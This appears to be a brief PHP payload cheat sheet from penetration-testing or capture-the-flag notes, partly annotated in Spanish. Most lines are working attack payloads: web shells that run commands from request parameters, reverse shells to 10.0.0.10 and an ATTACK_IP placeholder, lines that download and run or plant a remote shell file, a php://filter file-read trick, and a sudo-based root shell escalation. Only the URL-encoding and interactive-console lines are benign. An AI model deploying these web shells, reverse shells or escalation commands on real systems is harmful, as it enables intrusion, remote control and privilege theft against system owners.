# php
<?php system($_GET['cmd']);?>
<?PHP system($_REQUEST['cmd']); ?>
<?php system('ls -la');?>
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
<?php system("wget http://ip/file -o /tmp/file.php; php /tmp/file.php"); ?>

<?php exec("bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
<?php echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; ?>

# blind php test
<? php echo "Esto es una prueba de RCE" ;?>

# php put
<?php file_put_contents('shell.php', file_get_contents('http://[your-host]/shell.php'))?>

# php wrappers
http://10.10.208.6/?view=php://filter/read=convert.base64-encode/resource=./dog/../index

# php rev_shell oneliner
php -r '$sock=fsockopen("ATTACK_IP",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

# consola interactiva
php --interactive

# url encode/decode
php -r 'echo urldecode("oil+and+gas");'
php -r 'echo urlencode("oil and gas");'

# privesc
sudo php -r "system('/bin/sh');"
